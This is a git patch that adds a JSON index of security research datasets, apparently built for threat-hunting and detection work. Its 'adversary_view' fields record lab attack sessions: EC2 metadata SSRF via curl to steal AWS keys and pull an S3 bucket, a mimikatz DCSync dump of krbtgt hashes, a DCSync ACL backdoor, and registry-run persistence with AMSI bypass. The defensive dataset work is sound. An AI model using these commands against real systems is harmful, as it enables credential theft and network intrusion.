From 171c1f5f7fc53cd4f20a84da624722d3c00ccfb3 Mon Sep 17 00:00:00 2001
From: Ian Hellen <ianhelle@microsoft.com>
Date: Mon, 22 Aug 2022 15:13:55 -0700
Subject: [PATCH] Adding script to generate json indexes for remote use.

Adding initial index files to ./data/.index

Signed-off-by: Ian Hellen <ianhelle@microsoft.com>
---
 datasets/.index/sec-dsets-index.json     |   1 +
 datasets/.index/sec-dsets-index.json.gz  | Bin 0 -> 68506 bytes
 datasets/.index/sec-dsets-index.json.zip | Bin 0 -> 59176 bytes
 scripts/misc/create_json_index.py        | 203 +++++++++++++++++++++++
 4 files changed, 204 insertions(+)
 create mode 100644 datasets/.index/sec-dsets-index.json
 create mode 100644 datasets/.index/sec-dsets-index.json.gz
 create mode 100644 datasets/.index/sec-dsets-index.json.zip
 create mode 100644 scripts/misc/create_json_index.py

diff --git a/datasets/.index/sec-dsets-index.json b/datasets/.index/sec-dsets-index.json
new file mode 100644
index 00000000..c81edb9c
--- /dev/null
+++ b/datasets/.index/sec-dsets-index.json
@@ -0,0 +1 @@
+{"atomic": {"SDAWS-200914011940": {"title": "AWS Cloud Bank Breach S3", "id": "SDAWS-200914011940", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/09/13", "modification_date": "2020/09/13", "platform": ["AWS"], "type": "atomic", "tags": ["EC2 Proxy Abuse", "S3 Data Exfiltration"], "description": "This dataset represents adversaries abusing a misconfigured EC2 reverse proxy to obtain instance profile keys and eventually exfiltrate files from an S3 bucket.", "attack_mappings": [{"technique": "T1078", "sub-technique": "004", "tactics": ["TA0001", "TA0003", "TA0004", "TA0005"]}, {"technique": "T1530", "sub-technique": null, "tactics": ["TA0009"]}], "notebooks": null, "files": [{"type": "cloud", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/aws/collection/ec2_proxy_s3_exfiltration.zip"}], "simulation": {"environment": "https://github.com/OTRF/mordor-labs/tree/master/environments/aws/cloud-breach-s3", "tools": [{"type": "Cloud Formation Templates", "name": "AWS CLI", "module": "Exfiltration", "script": "https://github.com/OTRF/mordor-labs/tree/master/environments/aws/cloud-breach-s3"}], "permissions_required": ["user"], "adversary_view": "> curl -s http://35.174.154.220/latest/meta-data/iam/security-credentials/ -H \"Host:169.254.169.254\"                                            \nMordorNginxStack-BankingWAFRole-9S3E0UAE1MM0                                                                                                                                                              >\n\n> curl -s http://35.174.154.220/latest/meta-data/iam/security-credentials/MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0 -H \"Host:169.254.169.254\"\n{\n\"Code\" : \"Success\",\n\"LastUpdated\" : \"2020-09-14T00:49:26Z\",\n\"Type\" : \"AWS-HMAC\",\n\"AccessKeyId\" : \"ASIA5FLZVX4OPVKKVBMX\",\n\"SecretAccessKey\" : \"aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03\",\n\"Token\" : \"TOKEN\",\n\"Expiration\" : \"2020-09-14T07:10:27Z\"\n}\n\n> aws configure --profile erratic\nAWS Access Key ID [None]: ASIA5FLZVX4OPVKKVBMX\nAWS Secret Access Key [None]: aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03\nDefault region name [None]: us-east-1\nDefault output format [None]: json\n\n> echo aws_session_token = \"TOKEN\" >> ~/.aws/credentials \n\n> aws s3 ls --profile erratic\n2020-09-13 20:00:32 mordorctstack-s3bucketforcloudtrail-1gj7vvt2ul642\n2020-09-13 19:59:59 mordors3stack-s3bucket-llp2yingx64a\n\n> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile erratic\n2020-09-13 20:00:26         89 ring.txt\n\n> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile erratic\n2020-09-13 20:00:26         89 ring.txt\n\n> aws s3 sync s3://mordors3stack-s3bucket-llp2yingx64a . --profile erratic                                   \ndownload: s3://mordors3stack-s3bucket-llp2yingx64a/ring.txt to ./ring.txt"}, "references": ["https://github.com/RhinoSecurityLabs/cloudgoat/tree/master/scenarios/cloud_breach_s3"]}, "SDAWS-2202181000": {"title": "AWS S3 Honey Bucket Logs", "id": "SDAWS-2202181000", "contributors": ["Ashwin Patil @ashwinpatil"], "creation_date": "2022/02/18", "modification_date": "2022/02/18", "platform": ["AWS"], "type": "atomic", "tags": ["S3 Public Honeybucket Discovery"], "description": "This dataset represents adversaries trying to scan , discover and access open S3 honeybucket based on known hostname patterns. in this case honeybucket microsoft-devtest.s3.amazonaws.com.", "attack_mappings": [{"technique": "T1580", "sub-technique": null, "tactics": ["TA0007"]}], "notebooks": "https://github.com/microsoft/msticpy/blob/main/docs/notebooks/AWS_S3_HoneybucketLogAnalysis.ipynb", "files": [{"type": "cloud", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/aws/discovery/aws_s3_honeybucketlogs.zip"}], "simulation": {"environment": "https://dashboard.breachinsider.com/honey-buckets/", "permissions_required": ["user"], "adversary_view": "> pip3 install s3scanner\n\n> s3scanner --threads 8 scan --buckets-file ./bucket-names.txt                                                                                                                                                              >\n\n> curl -s \"microsoft-devtest.s3.amazonaws.com\"\n\n> aws s3 ls s3://microsoft-devtest.s3.amazonaws.com\n\n> echo 'Trying to write text file to open public bucket' > hello.txt\n\n> aws s3 sync hello.txt s3://microsoft-devtest.s3.amazonaws.com"}, "references": ["https://breachinsider.com/blog/honey-buckets-find-out-who-is-snooping-through-your-amazon-s3-buckets/"]}, "SDLIN-201110074812": {"title": "Arp Cache Discovery", "id": "SDLIN-201110074812", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/11/10", "modification_date": "2020/11/10", "platform": ["Linux"], "type": "atomic", "tags": null, "description": "This dataset represents a threat actor using arp to list out the arp cache.", "attack_mappings": [{"technique": "T1018", "sub-technique": null, "tactics": ["TA0007"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/linux/discovery/host/sh_arp_cache.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "sh", "module": "sh", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md#atomic-test-6---remote-system-discovery---arp-nix"}], "permissions_required": ["User"], "adversary_view": "wardog@UBUNTU5:~$ arp -a | grep -v '^?'\n_gateway (192.168.2.1) at 12:34:56:78:9a:bc [ether] on eth0 "}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md#atomic-test-6---remote-system-discovery---arp-nix"]}, "SDLIN-201110081941": {"title": "DD Binary Padding Hash Change", "id": "SDLIN-201110081941", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/11/10", "modification_date": "2020/11/10", "platform": ["Linux"], "type": "atomic", "tags": null, "description": "This dataset represents a threat actor using dd to add a zero to the binary to change the hash.", "attack_mappings": [{"technique": "T1027", "sub-technique": "001", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/linux/defense_evasion/host/sh_binary_padding_dd.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "sh", "module": "sh", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md#atomic-test-1---pad-binary-to-change-hash---linuxmacos-dd"}], "permissions_required": ["User"], "adversary_view": "md5sum /tmp/psexec.py \n5aa8b93e9b40c04d6d9d0cc8cd3975ed  /tmp/psexec.py\n\ndd if=/dev/zero bs=1 count=1 >> /tmp/psexec.py \n1+0 records in\n1+0 records out\n1 byte copied, 5.6002e-05 s, 17.9 kB/s\n\nmd5sum /tmp/psexec.py \nc509e5bd899de81d603da3f61e717837  /tmp/psexec.py"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md#atomic-test-1---pad-binary-to-change-hash---linuxmacos-dd"]}, "SDWIN-190301125905": {"title": "Empire Powerview Add-DomainObjectAcl", "id": "SDWIN-190301125905", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/03/01", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["AD Object Modification", "AD Object nTSecurityDescriptor", "LDAP ModifyRequest"], "description": "These datasets represent adversaries with enough permissions (i.e. domain admin) adding an access control entry (ACE) to the discretionary access control list (DACL) of an Active Directory object (i.e Root Domain). One example could be adversaries modifying the root domain DACL to allow a specific domain user, despite being in no privileged groups and not having local admin rights on the domain controller itself, to use Active Directory replication services and obtain secret domain data (i.e. Other user NTLM Hashes)", "attack_mappings": [{"technique": "T1222", "sub-technique": "001", "tactics": ["TA0005"]}], "notebooks": [{"project": "Threat Hunter Playbook", "name": "Active Directory Replication User Backdoor", "link": "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190101151110.html"}], "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/empire_powerview_ldap_ntsecuritydescriptor.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/network/empire_powerview_ldap_ntsecuritydescriptor.zip"}], "simulation": {"environment": "https://github.com/OTRF/mordor-labs/tree/master/environments/windows/shire", "tools": [{"type": "C2", "name": "Empire", "module": "powerview", "script": "https://github.com/EmpireProject/Empire/blob/master/data/module_source/situational_awareness/network/powerview.ps1"}], "permissions_required": ["Domain Admin"], "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            \nUF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         6404   5/0.0    2020-09-20 21:28:07  http            \n\n8BUCWV1P ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         2488   5/0.0    2020-09-21 17:09:43  http            \n\n(Empire: agents) > interact 8BUCWV1P\n(Empire: 8BUCWV1P) > scriptimport data/module_source/situational_awareness/network/powerview.ps1\n[*] Tasked 8BUCWV1P to run TASK_SCRIPT_IMPORT\n[*] Agent 8BUCWV1P tasked with task ID 1\n(Empire: 8BUCWV1P) > \nscript successfully saved in memory\n\n(Empire: 8BUCWV1P) > scriptcmd Add-DomainObjectAcl -TargetIdentity \"dc=theshire,dc=local\" -TargetDomain theshire.local -PrincipalIdentity nmartha -Rights DCSync\n[*] Tasked 8BUCWV1P to run TASK_SCRIPT_COMMAND\n[*] Agent 8BUCWV1P tasked with task ID 2\n(Empire: 8BUCWV1P) > \nJob started: 5WSPKL\n\n(Empire: 8BUCWV1P) > scriptcmd $nmarthaSid = Get-DomainUser nmartha | Select-Object -ExpandProperty objectsid; Get-DomainObjectACL  \"dc=theshire,dc=local\" -Domain theshire.local -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $nmarthaSid}\n[*] Tasked 8BUCWV1P to run TASK_SCRIPT_COMMAND\n[*] Agent 8BUCWV1P tasked with task ID 3\n(Empire: 8BUCWV1P) > \nJob started: YG1ZB3\n\nAceQualifier           : AccessAllowed\nObjectDN               : DC=theshire,DC=local\nActiveDirectoryRights  : ExtendedRight\nObjectAceType          : DS-Replication-Get-Changes-In-Filtered-Set\nObjectSID              : S-1-5-21-4228717743-1032521047-1810997296\nInheritanceFlags       : None\nBinaryLength           : 56\nAceType                : AccessAllowedObject\nObjectAceFlags         : ObjectAceTypePresent\nIsCallback             : False\nPropagationFlags       : None\nSecurityIdentifier     : S-1-5-21-4228717743-1032521047-1810997296-1103\nAccessMask             : 256\nAuditFlags             : None\nIsInherited            : False\nAceFlags               : None\nInheritedObjectAceType : All\nOpaqueLength           : 0\n\nAceQualifier           : AccessAllowed\nObjectDN               : DC=theshire,DC=local\nActiveDirectoryRights  : ExtendedRight\nObjectAceType          : DS-Replication-Get-Changes\nObjectSID              : S-1-5-21-4228717743-1032521047-1810997296\nInheritanceFlags       : None\nBinaryLength           : 56\nAceType                : AccessAllowedObject\nObjectAceFlags         : ObjectAceTypePresent\nIsCallback             : False\nPropagationFlags       : None\nSecurityIdentifier     : S-1-5-21-4228717743-1032521047-1810997296-1103\nAccessMask             : 256\nAuditFlags             : None\nIsInherited            : False\nAceFlags               : None\nInheritedObjectAceType : All\nOpaqueLength           : 0\n\nAceQualifier           : AccessAllowed\nObjectDN               : DC=theshire,DC=local\nActiveDirectoryRights  : ExtendedRight\nObjectAceType          : DS-Replication-Get-Changes-All\nObjectSID              : S-1-5-21-4228717743-1032521047-1810997296\nInheritanceFlags       : None\nBinaryLength           : 56\nAceType                : AccessAllowedObject\nObjectAceFlags         : ObjectAceTypePresent\nIsCallback             : False\nPropagationFlags       : None\nSecurityIdentifier     : S-1-5-21-4228717743-1032521047-1810997296-1103\nAccessMask             : 256\nAuditFlags             : None\nIsInherited            : False\nAceFlags               : None\nInheritedObjectAceType : All\nOpaqueLength           : 0"}, "references": null}, "SDWIN-190301174830": {"title": "Empire DCSync", "id": "SDWIN-190301174830", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/03/01", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["AD Replication services", "RPC DRSUAPI DsGetNCChanges"], "description": "This dataset represents adversaries abusing Active Directory Replication services to retrieve secret domain data (i.e. NTLM hashes) from domain accounts.", "attack_mappings": [{"technique": "T1003", "sub-technique": "006", "tactics": ["TA0006"]}], "notebooks": [{"project": "Threat Hunter Playbook", "name": "Active Directory Replication From Non-Domain-Controller Accounts", "link": "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html"}], "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_dcsync_dcerpc_drsuapi_DsGetNCChanges.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/network/empire_dcsync_dcerpc_drsuapi_DsGetNCChanges.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "DCSync", "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/credentials/Invoke-DCSync.ps1"}], "permissions_required": ["Domain Admin"], "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n4SUZ8X62 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         4092   5/0.0    2020-09-21 21:59:29  http            \n1EHYPBVC ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         7456   5/0.0    2020-09-21 22:56:58  http            \n\n(Empire: agents) > interact 1EHYPBVC\n(Empire: 1EHYPBVC) > \n(Empire: 1EHYPBVC) > usemodule credentials/mimikatz/dcsync\n(Empire: powershell/credentials/mimikatz/dcsync) > set user krbtgt\n(Empire: powershell/credentials/mimikatz/dcsync) > set domain theshire.local\n(Empire: powershell/credentials/mimikatz/dcsync) > set dc MORDORDC.theshire.local\n(Empire: powershell/credentials/mimikatz/dcsync) > info\n\n              Name: Invoke-Mimikatz DCsync\n            Module: powershell/credentials/mimikatz/dcsync\n        NeedsAdmin: False\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: True\n  OutputExtension: None\n\nAuthors:\n  @gentilkiwi\n  Vincent Le Toux\n  @JosephBialek\n\nDescription:\n  Runs PowerSploit's Invoke-Mimikatz function to extract a\n  given account password through Mimikatz's lsadump::dcsync\n  module. This doesn't need code execution on a given DC, but\n  needs to be run from a user context with DA equivalent\n  privileges.\n\nComments:\n  http://blog.gentilkiwi.com http://clymb3r.wordpress.com/\n\nOptions:\n\n  Name   Required    Value                     Description\n  ----   --------    -------                   -----------\n  Agent  True        1EHYPBVC                  Agent to run module on.                 \n  user   True        krbtgt                    Username to extract the hash for        \n                                              (domain\\username format).               \n  domain False       theshire.local            Specified (fqdn) domain to pull for the \n                                              primary domain/DC.                      \n  dc     False       MORDORDC.theshire.local   Specified (fqdn) domain controller to   \n                                              pull replication data from.             \n\n(Empire: powershell/credentials/mimikatz/dcsync) > execute\n[*] Tasked 1EHYPBVC to run TASK_CMD_JOB\n[*] Agent 1EHYPBVC tasked with task ID 1\n[*] Tasked agent 1EHYPBVC to run module powershell/credentials/mimikatz/dcsync\n(Empire: powershell/credentials/mimikatz/dcsync) > \nJob started: 5PKMSU\n\nHostname: WORKSTATION5.theshire.local / S-1-5-21-4228717743-1032521047-1810997296\n\n  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2020 20:07:46\n.## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ##       > http://blog.gentilkiwi.com/mimikatz\n'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/\n\nmimikatz(powershell) # lsadump::dcsync /user:krbtgt /domain:theshire.local /dc:MORDORDC.theshire.local\n[DC] 'theshire.local' will be the domain\n[DC] 'MORDORDC.theshire.local' will be the DC server\n[DC] 'krbtgt' will be the user account\n\nObject RDN           : krbtgt\n\n** SAM ACCOUNT **\n\nSAM Username         : krbtgt\nAccount Type         : 30000000 ( USER_OBJECT )\nUser Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )\nAccount expiration   : \nPassword last change : 9/17/2020 11:14:46 AM\nObject Security ID   : S-1-5-21-4228717743-1032521047-1810997296-502\nObject Relative ID   : 502\n\nCredentials:\n  Hash NTLM: c2547afe54ff225a546c48805714d000\n    ntlm- 0: c2547afe54ff225a546c48805714d000\n    lm  - 0: 376c6c28a8cfd97055be910640a24428\n\nSupplemental Credentials:\n* Primary:NTLM-Strong-NTOWF *\n    Random Value : a69dcd105b2fc3955a3f52ca00a26902\n\n* Primary:Kerberos-Newer-Keys *\n    Default Salt : THESHIRE.LOCALkrbtgt\n    Default Iterations : 4096\n    Credentials\n      aes256_hmac       (4096) : 2954d183aaca51936dea10ea187e198814fa57b136733ca167b5d3fcc5b6ab2a\n      aes128_hmac       (4096) : a8811f9942540c8f10c3837a6975d446\n      des_cbc_md5       (4096) : e36d674cc7c8b983\n\n* Primary:Kerberos *\n    Default Salt : THESHIRE.LOCALkrbtgt\n    Credentials\n      des_cbc_md5       : e36d674cc7c8b983\n\n* Packages *\n    NTLM-Strong-NTOWF\n\n* Primary:WDigest *\n    01  774cc07151941eb115c0fd700fa5715b\n    02  6a75ae70376df6a3a3e23f560890ac90\n    03  cd5fa9ee1e6ab120cd6edb6970f56f38\n    04  774cc07151941eb115c0fd700fa5715b\n    05  6a75ae70376df6a3a3e23f560890ac90\n    06  168d6e12549fcbfa3931ffe79e6a978f\n    07  774cc07151941eb115c0fd700fa5715b\n    08  c2fc61fda20bbacb17fb29b10d7b8144\n    09  c2fc61fda20bbacb17fb29b10d7b8144\n    10  2985ad74f9f6f53e7533662687998542\n    11  4f58b2e2f9e8505a4b364b5c7bb0f0c5\n    12  c2fc61fda20bbacb17fb29b10d7b8144\n    13  61c34cf9f0bb6f8062250ffff84cda07\n    14  4f58b2e2f9e8505a4b364b5c7bb0f0c5\n    15  8a1d00b5e9c900715124c0998c19b909\n    16  8a1d00b5e9c900715124c0998c19b909\n    17  da88e05b3fe5adc93f5838eb33fadb98\n    18  45d131a894f854b5400167647aa5ae0f\n    19  2a1e106ba660636a95def3aad248ca6c\n    20  c05fa8a38b50e8c9088d3a64a7659817\n    21  28c03b871631ef39fc8cbc7fbb8e52e8\n    22  28c03b871631ef39fc8cbc7fbb8e52e8\n    23  5e1dceb9c5260211633323b398af827d\n    24  e3b40de14a439d9c18c57cc60002c5f5\n    25  e3b40de14a439d9c18c57cc60002c5f5\n    26  e52cde43b834f641f9f80190b29064a7\n    27  3b2e4b4ad448b19043d422dc9bf4fadc\n    28  0c45e5c4ef958888593d806c650f0e3d\n    29  1822249537162bad7b9808ae6b51c627"}, "references": null}, "SDWIN-190319020147": {"title": "Empire Net Local Administrators Group", "id": "SDWIN-190319020147", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/03/19", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["Local Administrators Group Enumeration"], "description": "This dataset represents adversaries enumerating members of the local Administratrors group via the net.exe utility", "attack_mappings": [{"technique": "T1069", "sub-technique": "001", "tactics": ["TA0007"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/empire_shell_net_localgroup_administrators.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "shell", "script": "net localgroup Administrators"}], "permissions_required": ["User"], "adversary_view": "(Empire: 1EHYPBVC) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n4SUZ8X62 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         4092   5/0.0    2020-09-21 21:59:29  http            \n1EHYPBVC ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         7456   5/0.0    2020-09-21 23:18:05  http            \n\n(Empire: agents) > interact 1EHYPBVC\n(Empire: 1EHYPBVC) > shell net localgroup Administrators\n[*] Tasked 1EHYPBVC to run TASK_SHELL\n[*] Agent 1EHYPBVC tasked with task ID 2\n(Empire: 1EHYPBVC) > \nAlias name     Administrators\nComment        Administrators have complete and unrestricted access to the computer/domain\n\nMembers\n\n-------------------------------------------------------------------------------\nTHESHIRE\\Domain Admins\nwardog\nThe command completed successfully.\n\n\n..Command execution completed.\n\n(Empire: 1EHYPBVC) >"}, "references": null}, "SDWIN-190319020729": {"title": "Empire Net Local Users", "id": "SDWIN-190319020729", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/03/19", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["Local Users Enumeration"], "description": "This dataset represents adversaries enumerating all local users on an endpoint", "attack_mappings": [{"technique": "T1087", "sub-technique": "001", "tactics": ["TA0007"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/empire_shell_net_local_users.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "shell", "script": "net user"}], "permissions_required": ["User"], "adversary_view": "(Empire: 1EHYPBVC) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n4SUZ8X62 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         4092   5/0.0    2020-09-21 21:59:29  http            \n1EHYPBVC ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         7456   5/0.0    2020-09-21 23:25:39  http            \n\n(Empire: agents) > interact 1EHYPBVC\n(Empire: 1EHYPBVC) > shell net user\n[*] Tasked 1EHYPBVC to run TASK_SHELL\n[*] Agent 1EHYPBVC tasked with task ID 3\n(Empire: 1EHYPBVC) > \nUser accounts for \\\\WORKSTATION5\n\n-------------------------------------------------------------------------------\nDefaultAccount           Guest                    wardog                   \nWDAGUtilityAccount       \nThe command completed successfully.\n\n..Command execution completed.\n\n(Empire: 1EHYPBVC) > "}, "references": ["https://docs.microsoft.com/en-us/windows/win32/netmgmt/user-functions"]}, "SDWIN-190319021158": {"title": "Empire Net Domain Users", "id": "SDWIN-190319021158", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/03/19", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["Domain Users Enumeration", "RPC SAMR EnumDomainUsers"], "description": "This dataset represents adversaries enumerating all users that belong to a domain via RPC SAMR EnumDomainUsers.", "attack_mappings": [{"technique": "T1087", "sub-technique": "002", "tactics": ["TA0007"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/empire_shell_samr_EnumDomainUsers.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/network/empire_shell_samr_EnumDomainUsers.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "shell", "script": null}], "permissions_required": ["User"], "adversary_view": "(Empire: 1EHYPBVC) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n4SUZ8X62 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         4092   5/0.0    2020-09-21 21:59:29  http            \n1EHYPBVC ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         7456   5/0.0    2020-09-21 23:25:39  http            \n\n(Empire: agents) > interact 1EHYPBVC\n\n(Empire: 1EHYPBVC) > shell net user /domain\n[*] Tasked 1EHYPBVC to run TASK_SHELL\n[*] Agent 1EHYPBVC tasked with task ID 5\n(Empire: 1EHYPBVC) > \nThe request will be processed at a domain controller for domain theshire.local.\n\nUser accounts for \\\\MORDORDC.theshire.local\n\n-------------------------------------------------------------------------------\ndschrute                 Guest                    krbtgt                   \nlrodriguez               mscott                   nmartha                  \npbeesly                  pgustavo                 sbeavers                 \nsysmonsvc                wardog                   \nThe command completed successfully.\n\n..Command execution completed.\n\n(Empire: 1EHYPBVC) > "}, "references": null}, "SDWIN-190319023812": {"title": "Empire Userland Registry Run Keys", "id": "SDWIN-190319023812", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/03/19", "modification_date": "2020/09/04", "platform": ["Windows"], "type": "atomic", "tags": ["Local Registry Modification", "Registry Run Keys"], "description": "This dataset represents adversaries modifying local Run registry keys (i.e. HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run) for persistence. It also captures the execution of the persistence mechanism.", "attack_mappings": [{"technique": "T1547", "sub-technique": "001", "tactics": ["TA0003"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/empire_persistence_registry_modification_run_keys_standard_user.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "Registry", "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/persistence/Persistence.psm1"}], "permissions_required": ["Standard User"], "adversary_view": "(Empire: stager/multi/launcher) > \n(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nKU86XWEL ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         5376   5/0.0    2020-09-04 07:02:57  http            \n\n(Empire: agents) > interact KU86XWEL\n(Empire: KU86XWEL) > \n(Empire: KU86XWEL) > usemodule persistence/\nelevated/registry*                 misc/add_netuser                   misc/install_ssp*                  powerbreach/resolver\nelevated/rid_hijack*               misc/add_sid_history*              misc/memssp*                       userland/backdoor_lnk\nelevated/schtasks*                 misc/debugger*                     misc/skeleton_key*                 userland/registry\nelevated/wmi*                      misc/disable_machine_acct_change*  powerbreach/deaduser               userland/schtasks\nelevated/wmi_updater*              misc/get_ssps                      powerbreach/eventlog*              \n(Empire: KU86XWEL) > usemodule persistence/userland/registry\n(Empire: powershell/persistence/userland/registry) > info\n\n              Name: Invoke-Registry\n            Module: powershell/persistence/userland/registry\n        NeedsAdmin: False\n        OpsecSafe: False\n          Language: powershell\nMinLanguageVersion: 2\n        Background: False\n  OutputExtension: None\n\nAuthors:\n  @mattifestation\n  @harmj0y\n  @enigma0x3\n\nDescription:\n  Persist a stager (or script) via the\n  HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run registry\n  key. This has an easy detection/removal rating.\n\nComments:\n  https://github.com/mattifestation/PowerSploit/blob/master/Pe\n  rsistence/Persistence.psm1\n\nOptions:\n\n  Name             Required    Value                     Description\n  ----             --------    -------                   -----------\n  Agent            True        KU86XWEL                  Agent to run module on.                 \n  Listener         False                                 Listener to use.                        \n  Obfuscate        False       False                     Switch. Obfuscate the launcher          \n                                                        powershell code, uses the               \n                                                        ObfuscateCommand for obfuscation types. \n                                                        For powershell only.                    \n  ObfuscateCommand False       Token\\All\\1               The Invoke-Obfuscation command to use.  \n                                                        Only used if Obfuscate switch is True.  \n                                                        For powershell only.                    \n  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in \n                                                        the stager code.                        \n  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   \n                                                        the stager code.                        \n  KeyName          True        Updater                   Key name for the run trigger.           \n  RegPath          False       HKCU:Software\\Microsoft\\  Registry location to store the script   \n                              Windows\\CurrentVersion\\D  code. Last element is the key name.     \n                              ebug                    \n  